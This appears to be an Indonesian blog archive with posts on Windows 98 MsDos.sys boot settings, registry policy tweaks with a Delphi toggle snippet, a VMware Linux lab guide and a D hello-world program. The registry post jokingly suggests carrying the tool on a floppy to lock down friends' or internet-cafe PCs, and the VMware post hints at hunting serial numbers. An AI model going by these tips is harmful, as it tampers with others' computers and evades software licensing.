BootSafe = 1 (komputer akan selalu masuk ke safe mode)
BootSafe = 0 (komputer booting secara normal)

Setting BootKeys
================
Sewaktu komputer booting, user diperkenankan untuk memilih pilihan booting sehingga user dapat
memilih untuk booting ke Windows, MsDos, Safe mode, dll. Hal ini dapat dilakukan bila user
menekan tombol F8 sesaat setelah tampil tabel Configurations System pada layar monitor.
MsDos.sys jugalah yang mengatur diterima atau tidaknya penekanan tombol F8, yaitu pada setting
Bootkeys di bawah ini :

BootKeys = 0 (penekanan tombol F8 diterima)
BootKeys = 1 (penekanan tombol F8 tidak diterima)

Setting BootMenu
================
Dalam kaitannya dengan proses booting setelah user menekan tombol F8, maka akan tampil pilihan
menu booting seperti di bawah ini :

Microsoft Windows 98 Start Up Menu
===========================
1. Normal
2. Logged (\Bootlog.txt)
3. Safe Mode
4. Step-by-step Confirmation
5. Command Prompt Only
6. Safe Mode Command Prompt Only

Menu tersebut meminta user untuk menentukan pilihan modus yang akan digunakan dalam proses
booting, apakah normal, safe mode atau yang lain. Setting BootMenu juga dapat ditambahkan ke
MsDos.sys agar selalu menampilkan pilihan menu di atas meskipun user tidak menekan tombol F8.

BootMenu = 0 (menu tidak akan tampil meski user menekan F8)
BootMenu = 1 (menu selalu tampil meski user tidak menekan F8)

Setting BootDelay
=================
Masih juga berkaitan dengan topik di atas, jeda waktu yang diberikan kepada user untuk menekan
tombol F8 juga dapat diatur dengan MsDos.sys. Isikan saja setting BootDelay pada bagian option
MsDos.sys dengan waktu yang pembaca inginkan. Secara default (bawaan) jeda waktu yang diberikan
adalah 2 detik. Misalnya kita ingin membuat jeda waktunya 4 detik, maka masukkan dalam
MsDos.sys setting berikut ini :

BootDelay = 4 (Membuat jeda waktu 4 detik)

Setting Logo
============
Pada awal mula komputer booting maka secara otomatis akan ditampilkan logo Windows yang
memenuhi layar monitor. Dengan penekanan tombol ESC maka logo Windows akan hilang. Tetapi
beberapa saat kemudian akan tampil lagi. Dan pada saat komputer booting ulang maka logo Windows
akan tampil lagi. Setting Logo di sini berperan dalam masalah ini. Tambahkan setting Logo di
bawah bagian Option untuk menentukan apakah logo Windows akan tampil atau tidak tampil secara
permanen.

Logo = 1 (Logo Windows akan ditampilkan)
Logo = 0 (Logo Windows tidak ditampilkan)

Bila pembaca menambahkan setting Logo = 0, maka logo Windows tidak akan ditampilkan. Yang ada
hanya tulisan "Starting Windows 98 ..." yang tampil setelah tabel System Configuration.

Gambar 1.
Isi file MsDos.sys

Itulah setting - setting yang dapat pembaca terapkan untuk bermain - main dengan file
MsDos.sys. Sebagai catatan yang perlu sekali diingat, file ini adalah file sistem, kesalahan
mengutak - atik akan mengakibatkan Windows tidak berjalan normal atau bahkan corrupt. Ibarat
kita bermain dengan API…

---eof---

Belajar Registry

2008-06-07T03:53:00.001-07:00

Belajar Registry Bag I

Mungkin sudah banyak artikel yg memuat tentang registry windows. Disini penulis akan memulai dari awal, sebelum kita ketemu dengan Belajar Registry Bag II yang akan memuat program instant untuk implementasi perubahan yang akan dilakukan pada registry serta pembahasan program tersebut.OK
Kita mulai dari awal yaitu hal yg paling menjemukan yaitu teori......

Registry merupakan kumpulan dari data windows yang dipakai untuk mengatur jalannya sistem operasi windows. Untuk melakukan perubahan pada windows menggunakan program regedit. Caranya RUN lalu ketik regedit. Akan terlihat 6 root keys yang mempunyai tugas yang berbeda setiap key (mungkin tidak perlu dijelaskan satu persatu biar gak bosen bacanya, setuju?). Klo gak dijelasin gak belajar namanya he...he...
Penjelasan singkat keenam root keys :
1. HKEY_CLASSES_ROOT menangani semua jenis file yang ada di windows
dan menyimpan setting software
2. HKEY_USER menangani semua informasi user yang aktif serta menangani setting control panel pada sistem operasi windows
3. HKEY_CURRENT_USER menangani satu informasi user yang aktif pada
sistem operasi windows.
4. HKEY_LOCAL_MACHINE memuat informasi tentang hardware yang
dipakai pada komputer tersebut.
5. HKEY_CURRENT_CONFIG untuk mencatat konfigurasi sistem yang ada.
6. HKEY_DYN_DATA untuk mengetahui tingkat kinerja suatu sistem dan dalam jaringan.

Dengan begitu banyaknya manipulasi yang bisa dibuat di registry ini, penulis hanya akan menunjukkan beberapa manipulasi yg mudah dibuat, yang beberapa akan penulis implementasikan dalam bentuk program.
1. Mematikan fasilitas display properties (display settings muncul apabila, klik disembarang desktop pilih properties).untuk melakukan penguncian cari root keys brk :
¨HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\ system
¨Buat value baru dengan jenis data DWORD yaitu : NodispCpl (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1
Untuk melihat hasil manipulasi yg dibuat , klik disembarang desktop pilih properties.

2. Mematikan program regedit
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ system
¨ Buat value baru dengan jenis data DWORD yaitu : disableregistrytools (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1

3. Menghilangkan fasilitas RUN
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : NoRun (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1
4. Menghilangkan Fasilitas Find
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : NoFind (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1

5. Menghilangkan Fasilitas Shutdown
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : Noclose (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1
6. Mematikan pilihan SaveAs pada internet explorer
¨ HKEY_CURRENT_USER\software\microsoft\internetexplorer\restrictions
¨ Buat value baru dengan jenis data DWORD yaitu : NoBrowserSaveAs (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1
7. Menghilangkan pilihan Log off
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : NoLogOff (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1

8 Menghilangkan Pilihan FILE pada windows explorer
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : Nofilemenu (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1

Untuk menormalkan semua perubahan yang dibuat tinggal mengganti nilai 1 menjadi nilai 0

Semua perubahan yang dibuat diatas sudah penulis uji coba dan 100% berhasil. Penulis menggunakan windows 98 sebagai contoh. Untuk implementasi program akan dimuat pada Belajar Registry Bag II. Mudah2an temen2 yg baru belajar registry seperti saya ini dapat memanfaatkannya sebagai pembelajaran. Buat semua BALIHACK CREW maju terus

Sekarang kita lanjutkan belajar registry. Seperti yg telah saya janjikan artikel ini merupakan kelanjutan dari artikel Berkenalan dengan Registry Bag I yang isinya yaitu implementasi dlm bentuk program. Jadi kita kagak usah buka registry secara manual yg tentu sangat membosankan dan males seperti saya.

Program ini dibuat oleh SPC (semarapura punk crew), krn pas aku maen kekost dia n ngobrol tentang registry ternyata dia jg punya niat buat bikin program pengubah registry jd kenapa hrs pusing klo udah ada yg mau mengerjakannya.sekarang kita bahas beberapa perubahan yg ditambah pada program ini....

1. menghilangkan tab remote administration
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoAdminPage"
Tipe data "DWORD"

2. menghilangkan tab user profile
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoProfilePage"
Tipe data "DWORD"

3. menghilangkan tab change password
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoPwdPage"
Tipe data "DWORD"

4. Deactive ADD Printer
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\explorer"
Value "NoAddprinter"
Tipe data "DWORD"

5. Deactive delete Printer
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\explorer"
Value "Nodeleteprinter"
Tipe data "REG_DWORD"

6. Deactive tab general and detail printer
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\explorer"
Value "Noprintertabs"
Tipe data "DWORD"

7. hide tab Hardware Profile
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoConfigPage"
Tipe data "DWORD"

8. hide tab device manager
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoDevMgrPage"
Tipe data "DWORD"

9. hide button file system
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoFilesysPage. "
Tipe data "DWORD"

10. hide button Virtual Memory
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoVirtMemPage"
Tipe data "REG_DWORD"

Wah...segini aja,takut artikel kepanjangan dan membosankan bagi yg males baca seperti saya. Msh banyak hal yg didalam program yg belum dibahas pd kesempatan ini. mohon jangan marah...
OK...sekarang kita lihat beberapa baris script tools ini, yg menggunakan delphi....

procedure TForm1.CheckBox7Click(Sender: TObject);
begin
try
if checkbox7.Checked=true then
begin
spcReg:=TRegistry.Create;
spcReg.RootKey := HKEY_CURRENT_USER;
spcReg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\',false);
spcReg.WriteInteger('NoRun',1);
end
else if checkbox7.Checked=false then
begin
spcReg:=TRegistry.Create;
spcReg.RootKey := HKEY_CURRENT_USER;
spcReg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\',false);
spcReg.DeleteValue('NoRun');
end;
finally
spcReg.Free;
end;
end;

dari situ dapat kita lihat bahwa apabila kita memilih/check pilihan HIDE RUN, maka program akan memanggil key "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" dan akan membuat value baru dengan nama "NoRun" dan diberi nilai 1. Apabila HIDE RUN di centang lg, maka value NoRun akan dihapus. sehingga akan normal kembali.

apabila perubahan tidak dpt dilihat secara langsung, maka komputer harus direstart. program ini hanya berlaku untuk Win 9x. untuk windows ME,NT, dan XP hanya memungkin beberapa perubahan dikarenakan konfigurasi yg dipakai berbeda dari win 9x.
anda dapat download program ini di

www14.brinkster.com/putu4niki/regeditspc.zip

program ini dpt disimpan di disket,jd klo kemana mana bawa tools ini untuk mengerjai teman anda yg sombong ato ngerjai warnet (tp sayang kebanyakan warnet pake deep frezee)...he..he...cuma becanda....

belajar Linux dengan bantuan VMware Workstation

2008-06-07T03:52:00.001-07:00

VMware merupakan program untuk membuat virtual machine, sehingga kita bisa menjalankan dua OS sekaligus, VMware dapat di download di www.vmware.com sayang bukan merupakan freeware, namun untuk keperluan belajar kiranya ga ada salahnya kita cari S/N nya dengan bantuan google Phd.

Instalasi VMware mudah dilakukan, saya kira tidak perlu dibahas , kembali ke tujuan awal yaitu menggunakan VMware sebagai alat bantu belajar Linux. VMware tersedia
untuk Windows maupun Linux, diatas Virtual machine dr VMware kita dapat menginstall berbagai OS seperti; Windows, linux, freeBSD, dll.
Untuk artikel ini saya batasi VMware di install di atas OS windows dan nantinya kita akan menginstall Linux diatas virtual machine dari VMware tadi. Adapun gambaran umumnya sebagai berikut:
1. Instalasi VMware dengan OS dasar Windows.
2. Instalasi Linux pada virtual machine dr VMware.
3. Linux pada virtual machine kita perlakukan sebagai Server.
4. Windows kita perlakukan sebagai client.
5. siapkan program pembantu lain seperti (putty, winscp, ... tanya aja google Phd. dimana downloadnya qe3).
6. lakukan konfigurasi ke server Linux dengan bantuan putty (pura²nya remote dari jarak jauh).
7. Latihan Konfigurasi server DNS, apache, Samba, dll. sudah siap dilakukan.
8. dengan bantuan VMware kita dapat melakukan latihan nginstall, konfigurasi, sekuriti, nyoba exploit, ato bugs, Seru deh learn with Fun.... Selamat mencoba.

Masalah yang sering timbul
1. koneksi ke server error >> baca manualnya dah qe3

bahasa D

2008-06-07T03:25:00.000-07:00

program 1

#!/usr/bin/dmd -run
/* sh style script syntax is supported */

/* Hello World in D
To compile:
dmd hello.d
or to optimize:
dmd -O -inline -release hello.d
*/

import std.stdio;

void main(char[][] args)
{
writefln("Hello World, Reloaded");

// auto type inference and built-in foreach
foreach (argc, argv; args)
{
// Object Oriented Programming
CmdLin cl = new CmdLin(argc, argv);
// Improved typesafe printf
writefln(cl.argnum, cl.suffix, " arg: %s", cl.argv);
// Automatic or explicit memory management
delete cl;
}

// Nested structs and classes
struct specs
{
// all members automatically initialized
int count, allocated;
}

// Nested functions can refer to outer
// variables like args
specs argspecs()
{
specs* s = new specs;
// no need for '->'
s.count = args.length; // get length of array with .length
s.allocated = typeof(args).sizeof; // built-in native type properties
foreach (argv; args)
s.allocated += argv.length * typeof(argv[0]).sizeof;
return *s;
}

// built-in string and common string operations
writefln("argc = %d, " ~ "allocated = %d",
argspecs().count, argspecs().allocated);
}

class CmdLin
{
private int _argc;
private char[] _argv;

public:
this(int argc, char[] argv) // constructor
{
_argc = argc;
_argv = argv;
}

int argnum()
{
return _argc + 1;
}

char[] argv()
{
return _argv;
}

char[] suffix()
{
char[] suffix = "th";
switch (_argc)
{
case 0:
suffix = "st";
break;
case 1:
suffix = "nd";
break;
case 2:
suffix = "rd";
break;
default:
break;
}
return suffix;
}
}